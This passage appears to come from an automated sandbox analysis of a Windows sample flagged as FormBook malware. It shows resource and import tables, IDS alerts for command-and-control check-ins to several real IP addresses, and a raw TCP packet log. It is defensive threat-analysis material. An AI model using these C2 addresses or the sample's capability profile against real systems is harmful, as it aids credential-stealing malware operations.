                                                                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xdc7b80xaa8b4data1.0003163705285822
                                                                              RT_GROUP_ICON0x18706c0x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0x1870e40x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0x1870f80x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0x18710c0x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0x1871200xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0x1871fc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                              Imports

                                                                              DLLImport
                                                                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-14T10:24:28.619902+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44922313.248.169.4880TCP
                                                                              2025-01-14T10:24:53.839685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457319206.119.82.17280TCP
                                                                              2025-01-14T10:24:56.387302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457320206.119.82.17280TCP
                                                                              2025-01-14T10:24:58.924134+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457327206.119.82.17280TCP
                                                                              2025-01-14T10:25:01.443609+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.457343206.119.82.17280TCP
                                                                              2025-01-14T10:25:07.096702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45737467.223.117.14280TCP
                                                                              2025-01-14T10:25:09.625077+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45739567.223.117.14280TCP
                                                                              2025-01-14T10:25:12.197696+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45741167.223.117.14280TCP
                                                                              2025-01-14T10:25:14.747221+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45742767.223.117.14280TCP
                                                                              2025-01-14T10:25:20.684968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457463162.0.215.24480TCP
                                                                              2025-01-14T10:25:23.176391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457479162.0.215.24480TCP
                                                                              2025-01-14T10:25:25.619691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457496162.0.215.24480TCP
                                                                              2025-01-14T10:25:28.132064+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.457512162.0.215.24480TCP
                                                                              2025-01-14T10:25:33.752152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4575443.33.130.19080TCP
                                                                              2025-01-14T10:25:36.292105+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4575573.33.130.19080TCP
                                                                              2025-01-14T10:25:38.843157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4575703.33.130.19080TCP
                                                                              2025-01-14T10:25:41.405894+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4575833.33.130.19080TCP
                                                                              2025-01-14T10:25:55.782922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45760038.47.233.5280TCP
                                                                              2025-01-14T10:25:58.319121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45760138.47.233.5280TCP
                                                                              2025-01-14T10:26:00.896051+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45760238.47.233.5280TCP
                                                                              2025-01-14T10:26:03.413361+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45760338.47.233.5280TCP
                                                                              2025-01-14T10:26:08.910903+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457604104.21.3.19380TCP
                                                                              2025-01-14T10:26:12.082025+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457605104.21.3.19380TCP
                                                                              2025-01-14T10:26:14.006169+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.457606104.21.3.19380TCP
                                                                              2025-01-14T10:26:16.567525+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.457607104.21.3.19380TCP
                                                                              2025-01-14T10:26:22.054349+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576083.33.130.19080TCP
                                                                              2025-01-14T10:26:24.615122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576093.33.130.19080TCP
                                                                              2025-01-14T10:26:27.168370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4576103.33.130.19080TCP
                                                                              2025-01-14T10:26:29.699619+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4576113.33.130.19080TCP
                                                                              2025-01-14T10:26:36.262702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761220.244.96.6580TCP
                                                                              2025-01-14T10:26:38.809818+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761320.244.96.6580TCP
                                                                              2025-01-14T10:26:41.356459+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761420.244.96.6580TCP
                                                                              2025-01-14T10:26:43.767121+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45761520.244.96.6580TCP
                                                                              2025-01-14T10:26:57.375175+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761684.32.84.3280TCP
                                                                              2025-01-14T10:26:59.898580+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761784.32.84.3280TCP
                                                                              2025-01-14T10:27:02.468302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45761884.32.84.3280TCP
                                                                              2025-01-14T10:27:05.120371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45761984.32.84.3280TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2025 10:24:20.973649025 CET4922153192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:20.978554010 CET53492211.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:20.978636980 CET4922153192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:20.983422041 CET53492211.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:21.454375029 CET4922153192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:21.459791899 CET53492211.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:21.459999084 CET4922153192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:28.138590097 CET4922380192.168.2.413.248.169.48
                                                                              Jan 14, 2025 10:24:28.143562078 CET804922313.248.169.48192.168.2.4
                                                                              Jan 14, 2025 10:24:28.143663883 CET4922380192.168.2.413.248.169.48
                                                                              Jan 14, 2025 10:24:28.150047064 CET4922380192.168.2.413.248.169.48
                                                                              Jan 14, 2025 10:24:28.154962063 CET804922313.248.169.48192.168.2.4
                                                                              Jan 14, 2025 10:24:28.619780064 CET804922313.248.169.48192.168.2.4
                                                                              Jan 14, 2025 10:24:28.619827032 CET804922313.248.169.48192.168.2.4
                                                                              Jan 14, 2025 10:24:28.619901896 CET4922380192.168.2.413.248.169.48
                                                                              Jan 14, 2025 10:24:28.622289896 CET4922380192.168.2.413.248.169.48
                                                                              Jan 14, 2025 10:24:28.627151012 CET804922313.248.169.48192.168.2.4
                                                                              Jan 14, 2025 10:24:34.520750046 CET5731453192.168.2.4162.159.36.2
                                                                              Jan 14, 2025 10:24:34.525805950 CET5357314162.159.36.2192.168.2.4
                                                                              Jan 14, 2025 10:24:34.525878906 CET5731453192.168.2.4162.159.36.2
                                                                              Jan 14, 2025 10:24:34.530762911 CET5357314162.159.36.2192.168.2.4
                                                                              Jan 14, 2025 10:24:35.000288963 CET5731453192.168.2.4162.159.36.2
                                                                              Jan 14, 2025 10:24:35.005728960 CET5357314162.159.36.2192.168.2.4
                                                                              Jan 14, 2025 10:24:35.005819082 CET5731453192.168.2.4162.159.36.2
                                                                              Jan 14, 2025 10:24:52.908379078 CET5731980192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:52.914700985 CET8057319206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:52.914937973 CET5731980192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:52.923654079 CET5731980192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:52.929033995 CET8057319206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:53.838659048 CET8057319206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:53.839509010 CET8057319206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:53.839684963 CET5731980192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:54.434679031 CET5731980192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:55.452377081 CET5732080192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:55.458559036 CET8057320206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:55.458652020 CET5732080192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:55.466136932 CET5732080192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:55.472027063 CET8057320206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:56.386970043 CET8057320206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:56.387101889 CET8057320206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:56.387301922 CET5732080192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:56.981517076 CET5732080192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:58.000243902 CET5732780192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:58.005382061 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.005481958 CET5732780192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:58.014214039 CET5732780192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:58.019145012 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019215107 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019244909 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019279957 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019306898 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019378901 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019407988 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019435883 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.019463062 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.923877954 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.924072981 CET8057327206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:24:58.924134016 CET5732780192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:24:59.528309107 CET5732780192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:00.547172070 CET5734380192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:00.552978039 CET8057343206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:25:00.553060055 CET5734380192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:00.558845043 CET5734380192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:00.563997984 CET8057343206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:25:01.443435907 CET8057343206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:25:01.443540096 CET8057343206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:25:01.443608999 CET5734380192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:01.445863008 CET5734380192.168.2.4206.119.82.172
                                                                              Jan 14, 2025 10:25:01.450696945 CET8057343206.119.82.172192.168.2.4
                                                                              Jan 14, 2025 10:25:06.474091053 CET5737480192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:06.479039907 CET805737467.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:06.479099035 CET5737480192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:06.500929117 CET5737480192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:06.505894899 CET805737467.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:07.096520901 CET805737467.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:07.096652985 CET805737467.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:07.096702099 CET5737480192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:08.012649059 CET5737480192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:09.032473087 CET5739580192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:09.037623882 CET805739567.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:09.037734032 CET5739580192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:09.049071074 CET5739580192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:09.053925037 CET805739567.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:09.624825954 CET805739567.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:09.624847889 CET805739567.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:09.625077009 CET5739580192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:10.559571028 CET5739580192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:11.577552080 CET5741180192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:11.582812071 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.582943916 CET5741180192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:11.594302893 CET5741180192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:11.599221945 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599376917 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599406958 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599457979 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599486113 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599514008 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599544048 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599570990 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:11.599597931 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:12.197561979 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:12.197628975 CET805741167.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:12.197695971 CET5741180192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:13.106992006 CET5741180192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.130462885 CET5742780192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.135502100 CET805742767.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:14.135600090 CET5742780192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.141410112 CET5742780192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.146339893 CET805742767.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:14.747024059 CET805742767.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:14.747080088 CET805742767.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:14.747220993 CET5742780192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.750025988 CET5742780192.168.2.467.223.117.142
                                                                              Jan 14, 2025 10:25:14.754856110 CET805742767.223.117.142192.168.2.4
                                                                              Jan 14, 2025 10:25:19.785536051 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:19.790707111 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:19.790924072 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:19.805500031 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:19.810570002 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.684838057 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.684899092 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.684932947 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.684968948 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.684967995 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:20.685003996 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.685024977 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:20.690743923 CET8057463162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:20.690819979 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:21.309588909 CET5746380192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:22.330528975 CET5747980192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:22.336030006 CET8057479162.0.215.244192.168.2.4
                                                                              Jan 14, 2025 10:25:22.336183071 CET5747980192.168.2.4162.0.215.244
                                                                              Jan 14, 2025 10:25:22.349761009 CET5747980192.168.2.4162.0.215.244
